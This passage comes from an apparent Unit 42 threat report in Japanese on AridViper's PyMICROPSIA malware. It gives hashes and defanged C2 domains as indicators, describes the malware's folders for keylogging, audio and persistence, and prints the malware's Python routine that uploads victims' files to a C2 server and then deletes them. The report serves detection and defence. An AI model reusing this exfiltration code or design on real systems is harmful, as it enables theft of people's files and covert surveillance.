aligncenter\"><img  class=\"wp-image-110187 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-196.png\" alt=\"MICROPSIA\u306f\u3001\u30b3\u30fc\u30c9\u306bThe Big Bang Theory\u3084Game of Thrones\u306a\u3069\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u304c\u3042\u308b\u3053\u3068\u304c\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\u4e0a\u8a18\u306e\u4ff3\u512aFran Drescher\u306e\u8a00\u53ca\u306f\u3001\u4ee5\u524d\u89b3\u6e2c\u3055\u308c\u305f\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u3068\u540c\u69d8\u3068\u601d\u308f\u308c\u307e\u3059\u3002\" width=\"788\" height=\"230\" \/><figcaption id=\"caption-attachment-110186\" class=\"wp-caption-text\">\u56f315.MICROPSIA\u306f\u3001\u30b3\u30fc\u30c9\u306bThe Big Bang Theory\u3084Game of Thrones\u306a\u3069\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u304c\u3042\u308b\u3053\u3068\u304c\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\u4e0a\u8a18\u306e\u4ff3\u512aFran Drescher\u306e\u8a00\u53ca\u306f\u3001\u4ee5\u524d\u89b3\u6e2c\u3055\u308c\u305f\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u3068\u540c\u69d8\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/figcaption><\/figure>\n<figure id=\"attachment_110188\" aria-describedby=\"caption-attachment-110188\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110189 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-197.png\" alt=\"MICROPSIA\u306f\u3001\u30b3\u30fc\u30c9\u306bThe Big Bang Theory\u3084Game of Thrones\u306a\u3069\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u304c\u3042\u308b\u3053\u3068\u304c\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\u4e0a\u8a18\u306e\u4ff3\u512aKeanu Reeves\u306e\u8a00\u53ca\u306f\u3001\u4ee5\u524d\u89b3\u6e2c\u3055\u308c\u305f\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u3068\u540c\u69d8\u3068\u601d\u308f\u308c\u307e\u3059\u3002\" width=\"900\" height=\"247\" \/><figcaption id=\"caption-attachment-110188\" class=\"wp-caption-text\">\u56f316.MICROPSIA\u306f\u3001\u30b3\u30fc\u30c9\u306bThe Big Bang Theory\u3084Game of Thrones\u306a\u3069\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u304c\u3042\u308b\u3053\u3068\u304c\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\u4e0a\u8a18\u306e\u4ff3\u512aKeanu Reeves\u306e\u8a00\u53ca\u306f\u3001\u4ee5\u524d\u89b3\u6e2c\u3055\u308c\u305f\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u3068\u540c\u69d8\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/figcaption><\/figure>\n<p>\u307e\u305f\u3001\u300c\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u300d\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305f\u3088\u3046\u306b\u3001C2\u6d3b\u52d5\u306b\u306f\u591a\u6570\u306eDisney\u306e\u8a00\u53ca\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u3082\u30461\u3064\u8208\u5473\u6df1\u3044\u306e\u306f\u3001\u30b3\u30fc\u30c9\u5185\u306b\u30a2\u30e9\u30d3\u30a2\u8a9e\u306e\u30b3\u30e1\u30f3\u30c8\u304c\u5b58\u5728\u3059\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n<pre class=\"lang:python decode:true \">Delete_Request_Error('\u0644\u0645 \u064a\u062a\u0645 \u0636\u063a\u0637 \u0647\u0630\u0627 \u0627\u0644\u0645\u0644\u0641!!..')<\/pre>\n<p>\u3053\u308c\u306f\u3001\u507d\u30d5\u30e9\u30b0\u306e\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30d7\u30eb\u306e\u5730\u57df\u5c5e\u6027\u306b\u95a2\u4fc2\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u3082\u3042\u308a\u307e\u3059\u3002<\/p>\n<h2>\u7d50\u8ad6<\/h2>\n<p>AridViper\u306f\u3001\u6b66\u5668\u306e\u4e00\u90e8\u3068\u3057\u3066\u65b0\u3057\u3044\u30c4\u30fc\u30eb\u306e\u958b\u767a\u3092\u7d9a\u3051\u3066\u3044\u308b\u30a2\u30af\u30c6\u30a3\u30d6\u306a\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u3067\u3059\u3002PyMICROPSIA\u306b\u3064\u3044\u3066\u306f\u3001MICROPSIA\u306a\u3069\u4ed6\u306e\u65e2\u5b58\u306eAridViper\u30c4\u30fc\u30eb\u3068\u306e\u8907\u6570\u306e\u985e\u4f3c\u70b9\u304c\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001\u5f0a\u793e\u304c\u5206\u6790\u3057\u305fPyMICROPSIA\u306e\u3055\u307e\u3056\u307e\u306a\u5074\u9762\u306b\u57fa\u3065\u304f\u3068\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u306f\u307e\u3060\u4f7f\u7528\u3055\u308c\u3066\u3044\u306a\u3044\u8907\u6570\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u3053\u306e\u653b\u6483\u8005\u304c\u30a2\u30af\u30c6\u30a3\u30d6\u306b\u958b\u767a\u4e2d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067\u672c\u7a3f\u3067\u6982\u8aac\u3057\u305f\u653b\u6483\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>MICROPSIA\u3068PyMICROPSIA\u3092\u542b\u3080\u3059\u3079\u3066\u306e\u57fa\u5730\u306eAridViper\u30c4\u30fc\u30eb\u306f\u3001WildFire\u3067\u306f\u60aa\u610f\u304c\u3042\u308b\u3068\u5224\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/li>\n<li>AutoFocus\u3092\u3054\u4f7f\u7528\u306e\u304a\u5ba2\u69d8\u306f\u3001AridViper\u306e\u653b\u6483\u8005\u3068\u305d\u306e\u30c4\u30fc\u30eb\u3092\u8ffd\u8de1\u3067\u304d\u307e\u3059\u3002<\/li>\n<li>Cortex XDR\u306f\u3001PyMICROPSIA\u3068\u305d\u308c\u304c\u30c9\u30ed\u30c3\u30d7\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u4e21\u65b9\u3092\u30d6\u30ed\u30c3\u30af\u3067\u304d\u307e\u3059\u3002<\/li>\n<li>C2\u30c9\u30e1\u30a4\u30f3\u306f\u3001URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0\u3068DNS Security\u3067\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u3068\u5206\u985e\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/li>\n<\/ul>\n<h2>IoC<\/h2>\n<h4><strong>PyMICROPSIA\u306e\u30b5\u30f3\u30d7\u30eb<\/strong><\/h4>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">11487246a864ee0edf2c05c5f1489558632fb05536d6a599558853640df8cd78<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">ddaeffb12a944a5f4d47b28affe97c1bc3a613dab32e5b5b426ef249cfc29273<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531<\/span><\/p>\n<h4><strong>MICROPSIA\u306e\u30b5\u30f3\u30d7\u30eb<\/strong><\/h4>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">47d53f4ab24632bf4ca34e9a10e11b4b6c48a242cbcfcb1579d67523463e59d2<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">eab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">078212fc6d69641e96ed04352fba4d028fd5eadc87c7a4169bfbcfc52b8ef8f2<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">26253e9027f798bafc4a70bef1b5062f096a72b0d7af3065b0f4a9b3be937c99<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">42fa99e574b8ac5eddf084a37ef891ee4d16742ace9037cda3cdf037678e7512<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">a60cadbf6f5ef8a2cbb699b6d7f072245c8b697bbad5c8639bca9bb55f57ae65<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">b0562b41552a2fa744390a5f79a843940dade57fcf90cd23187d9c757dc32c37<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">b61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">d28ab0b04dc32f1924f1e50a5cf864325c901e11828200629687cca8ce6b2d5a<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">db1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">e869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">eda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768<\/span><\/p>\n<p><strong>AridViper Infrastructure<\/strong><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">baldwin-gonzalez[.]live<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">jaime-martinez[.]info<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">judystevenson[.]info<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">robert-keegan[.]life<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">benyallen[.]club<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">chad-jessie[.]info<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">escanor[.]live<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">krasil-anthony[.]icu<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">nicoledotson[.]icu<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">samwinchester[.]club<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">tatsumifoughtogre[.]club<\/span><\/p>\n<h2>\u53c2\u8003\u60c5\u5831: PyMYCROPSIA\u30de\u30eb\u30a6\u30a7\u30a2\u5206\u6790<\/h2>\n<p>\u4ee5\u4e0b\u306ePyMICROPSIA\u306e\u5206\u6790\u306f\u3001\u4ee5\u4e0b\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">SHA-256: 46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531<\/span><\/p>\n<h4><strong>\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u521d\u671f\u5316<\/strong><\/h4>\n<h6><strong>\u74b0\u5883\u3068\u8a2d\u5b9a<\/strong><\/h6>\n<p>\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u521d\u671f\u5316\u306e\u4e00\u90e8\u3068\u3057\u3066\u3001PyMICROPSIA\u306e\u4ee5\u4e0b\u306e2\u3064\u306e\u4e3b\u306a\u5074\u9762\u3092\u53d6\u308a\u4e0a\u3052\u308b\u3053\u3068\u304c\u91cd\u8981\u3067\u3059\u3002<\/p>\n<ul>\n<li>\u3055\u307e\u3056\u307e\u306a\u76ee\u7684\u3067\u8907\u6570\u306e\u30d5\u30a9\u30eb\u30c0\u3092\u4f5c\u6210\u3059\u308b\u3002<\/li>\n<li>C2\u30b5\u30fc\u30d0\u30fc\u306e\u30ea\u30b9\u30c8\u3092\u5b9a\u7fa9\u3059\u308b\u3002<\/li>\n<\/ul>\n<figure id=\"attachment_110190\" aria-describedby=\"caption-attachment-110190\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110191 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-198.png\" alt=\"\u3053\u3053\u306b\u793a\u3059\u521d\u671f\u5316\u4e2d\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u69cb\u9020\u306b\u306f\u3001\u3055\u307e\u3056\u307e\u306a\u76ee\u7684\u3092\u6301\u3064\u8907\u6570\u30d5\u30a9\u30eb\u30c0\u306e\u4f5c\u6210\u304c\u542b\u307e\u308c\u307e\u3059\u3002\u307e\u305f\u3001\u3053\u308c\u306b\u3088\u3063\u3066C2\u30b5\u30fc\u30d0\u30fc\u306e\u30ea\u30b9\u30c8\u304c\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002 \" width=\"900\" height=\"562\" \/><figcaption id=\"caption-attachment-110190\" class=\"wp-caption-text\">\u56f317.\u521d\u671f\u5316\u4e2d\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u69cb\u9020<\/figcaption><\/figure>\n<p>\u521d\u671f\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u8a2d\u5b9a\u3067\u5b9a\u7fa9\u3055\u308c\u308b\u30d5\u30a1\u30a4\u30eb\u304a\u3088\u3073\u30d5\u30a9\u30eb\u30c0\u3054\u3068\u306e\u4e3b\u306a\u76ee\u7684\u3092\u3001\u6b21\u306e\u8868\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<table style=\"width: 99.6037%;\">\n<tbody>\n<tr>\n<td style=\"width: 20.1936%;\"><strong>\u30c7\u30a3\u30ec\u30af\u30c8\u30ea<\/strong><\/td>\n<td style=\"width: 202.075%;\"><strong>\u76ee\u7684<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">Rar_com_Folder<\/td>\n<td style=\"width: 202.075%;\">RAR\u5727\u7e2e\u6e08\u307f\u60c5\u5831\u7528\u306e\u30b9\u30c8\u30ec\u30fc\u30b8\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">DevName<\/td>\n<td style=\"width: 202.075%;\">RAR\u5727\u7e2e\u6e08\u307f\u60c5\u5831\u7528\u306e\u30b9\u30c8\u30ec\u30fc\u30b8\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">DevNameSound<\/td>\n<td style=\"width: 202.075%;\">\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u7528\u30b9\u30c8\u30ec\u30fc\u30b8\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">DevNameKeyPress<\/td>\n<td style=\"width: 202.075%;\">\u30ad\u30fc\u30ed\u30ac\u30fc\u51fa\u529b\u60c5\u5831\u7528\u30b9\u30c8\u30ec\u30fc\u30b8\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">MyFolderName<\/td>\n<td style=\"width: 202.075%;\">\u591a\u7528\u9014\u30d5\u30a9\u30eb\u30c0\u3002\u8a2d\u5b9a\u3001\u53ce\u96c6\u3055\u308c\u305f\u60c5\u5831\u306e\u51fa\u529b\u306a\u3069\u3092\u683c\u7d0d\u3059\u308b\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">downloadNameApp<\/td>\n<td style=\"width: 202.075%;\">C2\u304b\u3089\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u305f\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u7528\u30d5\u30a1\u30a4\u30eb\u540d\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">NameApps<\/td>\n<td style=\"width: 202.075%;\">C2\u304b\u3089\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u305f\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u7528\u30d5\u30a1\u30a4\u30eb\u540d\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 20.1936%;\">NameAppShurt<\/td>\n<td style=\"width: 202.075%;\">\u6c38\u7d9a\u5316\u306e\u305f\u3081\u306b\u4f5c\u6210\u3055\u308c\u305f\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u7528\u30d5\u30a1\u30a4\u30eb\u540d\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><a id=\"post-110155-_30j0zll\"><\/a><span style=\"font-size: 12pt;\"><sup><span style=\"color: #999999;\"><em>\u88683 \u8a2d\u5b9a\u30d5\u30a9\u30eb\u30c0\u304a\u3088\u3073\u30d5\u30a1\u30a4\u30eb\u306e\u4e3b\u306a\u76ee\u7684<\/em><\/span><\/sup><\/span><\/p>\n<h6><strong>\u30c7\u30d0\u30a4\u30b9\u306e\u8b58\u5225\u5b50<\/strong><\/h6>\n<p>\u30c7\u30d0\u30a4\u30b9\u306f\u3001\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3001\u30e6\u30fc\u30b6\u30fc\u540d\u3001\u304a\u3088\u3073\u30e9\u30f3\u30c0\u30e0\u306b\u751f\u6210\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u7d44\u307f\u5408\u308f\u305b\u306b\u57fa\u3065\u3044\u3066\u8b58\u5225\u3055\u308c\u307e\u3059\u3002\u30b3\u30fc\u30c9\u306f\u3001\u751f\u6210\u3055\u308c\u308b\u3068\u591a\u7528\u9014\u30d5\u30a9\u30eb\u30c0\u201cMyFolderName\u201d\u306b\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110192\" aria-describedby=\"caption-attachment-110192\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110193 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-199.png\" alt=\"\u30b3\u30fc\u30c9\u306f\u3001\u751f\u6210\u3055\u308c\u308b\u3068\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u591a\u7528\u9014\u30d5\u30a9\u30eb\u30c0\" width=\"900\" height=\"463\" \/><figcaption id=\"caption-attachment-110192\" class=\"wp-caption-text\">\u56f318.\u30c7\u30d0\u30a4\u30b9\u540d\u306e\u521d\u671f\u5316<\/figcaption><\/figure>\n<p>\u3053\u306e\u8b58\u5225\u5b50\u95a2\u6570\u306f\u3001C2\u3068\u306e\u901a\u4fe1\u4e2d\u306b\u6a19\u7684\u3092\u8ffd\u8de1\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002<\/p>\n<h6>C2\u306e\u9078\u629e<\/h6>\n<p>\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306e\u89b3\u70b9\u304b\u3089\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u7279\u5b9a\u306e\u30d1\u30b9\u3078\u306ePOST\u8981\u6c42\u306b\u3088\u308b\u63a5\u7d9a\u30c6\u30b9\u30c8\u306b\u57fa\u3065\u3044\u3066\u8a2d\u5b9a\u6e08\u307f\u30ea\u30b9\u30c8\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u3092\u9078\u629e\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110194\" aria-describedby=\"caption-attachment-110194\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110195 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-200.png\" alt=\"\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306e\u89b3\u70b9\u304b\u3089\u306f\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u7279\u5b9a\u306e\u30d1\u30b9\u3078\u306ePOST\u8981\u6c42\u306b\u3088\u308b\u63a5\u7d9a\u30c6\u30b9\u30c8\u306b\u57fa\u3065\u3044\u3066\u8a2d\u5b9a\u6e08\u307f\u30ea\u30b9\u30c8\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u3092\u9078\u629e\u3057\u307e\u3059\u3002 \" width=\"900\" height=\"326\" \/><figcaption id=\"caption-attachment-110194\" class=\"wp-caption-text\">\u56f319.\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u4e0a\u306eC2\u306e\u9078\u629e<\/figcaption><\/figure>\n<p>\u305d\u3057\u3066\u3001\u305d\u306e\u7d50\u679c\u3068\u3057\u3066\u9078\u629e\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u3092\u591a\u7528\u9014\u30d5\u30a9\u30eb\u30c0\"MyFolderName\"\u306b\u683c\u7d0d\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110196\" aria-describedby=\"caption-attachment-110196\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110197 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-201.png\" alt=\"\u305d\u3057\u3066\u3001\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u305d\u306e\u7d50\u679c\u3068\u3057\u3066\u9078\u629e\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u3092\u591a\u7528\u9014\u30d5\u30a9\u30eb\u30c0MyFolderName\u306b\u683c\u7d0d\u3057\u307e\u3059\u3002 \" width=\"900\" height=\"162\" \/><figcaption id=\"caption-attachment-110196\" class=\"wp-caption-text\">\u56f320.\u9078\u629e\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u8a2d\u5b9a\u30b9\u30c8\u30ec\u30fc\u30b8<\/figcaption><\/figure>\n<h4><strong>\u30e1\u30a4\u30f3\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u30eb\u30fc\u30d7<\/strong><\/h4>\n<p>\u521d\u671f\u306e\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u5b8c\u4e86\u5f8c\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u6a5f\u80fd\u306f\u3001\u30eb\u30fc\u30d7\u306b\u5165\u308b\u3053\u3068\u3067\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u958b\u59cb\u3055\u308c\u307e\u3059(\u56f33\u3092\u53c2\u7167)\u3002<\/p>\n<ul>\n<li>\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3068\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u305f\u3081\u306e\u8907\u6570\u306e\u72ec\u7acb\u30b9\u30ec\u30c3\u30c9\u304c\u958b\u59cb\u3055\u308c\u307e\u3059\u3002<\/li>\n<li>\u6c38\u7d9a\u5316\u3001\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u3001\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3001\u304a\u3088\u3073C2\u30aa\u30da\u30ec\u30fc\u30bf\u3068\u306e\u3084\u308a\u53d6\u308a\u3068\u3044\u3063\u305f\u4e3b\u8981\u9818\u57df\u306b\u5bfe\u5fdc\u3059\u308b\u8907\u6570\u306e\u7279\u5b9a\u306e\u30bf\u30b9\u30af\u304c\u5b9a\u671f\u7684\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/li>\n<\/ul>\n<h4><strong>C2\u306e\u5b9f\u88c5<\/strong><\/h4>\n<h6><strong>\u30d7\u30ed\u30c8\u30b3\u30eb\u306e\u5b9f\u88c5<\/strong><\/h6>\n<p>\u30d7\u30ed\u30c8\u30b3\u30eb\u306e\u5b9f\u88c5\u306f\u5358\u7d14\u3067\u3059\u3002\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u3001\u547c\u3073\u51fa\u3059\u6a5f\u80fd\u306b\u5fdc\u3058\u3066\u3055\u307e\u3056\u307e\u306aURI\u30d1\u30b9\u304a\u3088\u3073\u5909\u6570\u3092\u4f7f\u7528\u3057\u3066HTTP POST\u8981\u6c42\u3092\u4ecb\u3057\u3066\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002<\/p>\n<p>\u305f\u3068\u3048\u3070\u3001\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3067\u306f\u3001HTTP POST\u8981\u6c42\u304c\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:python decode:true\">def Upload_File(type, path, FranDrescher, NB):\r\n\u00a0\u00a0\u00a0if not os.path.exists(path):\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return True\r\n\u00a0\u00a0\u00a0url = FranDrescher + '\/zoailloaze\/sfuxmiibif\/hortense1'\r\n\u00a0\u00a0\u00a0datei_hochladen = open(path, 'rb')\r\n\u00a0\u00a0\u00a0files = {'terrell': datei_hochladen}\r\n\u00a0\u00a0\u00a0status = False\r\n\u00a0\u00a0\u00a0while not status:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ur = requests.post(url, files=files, data={'beau': name_device + ';' + str(NB),\u00a0 'type': type,\u00a0 'FComp': str(NumComPers())})\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if ur.text == 'true':\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0status = True\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0datei_hochladen.close()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0os.remove(path)<\/pre>\n<p>\u3053\u306e\u8981\u6c42\u306b\u306f\u4ee5\u4e0b\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li>URI\u30d1\u30b9: \u2018\/zoailloaze\/sfuxmiibif\/hortense1\u2019<\/li>\n<li>\u201cterrel\u201d\u5909\u6570\u306e\u4e0b\u306e\u30de\u30eb\u30c1\u30d1\u30fc\u30c8 \u30a8\u30f3\u30b3\u30fc\u30c9 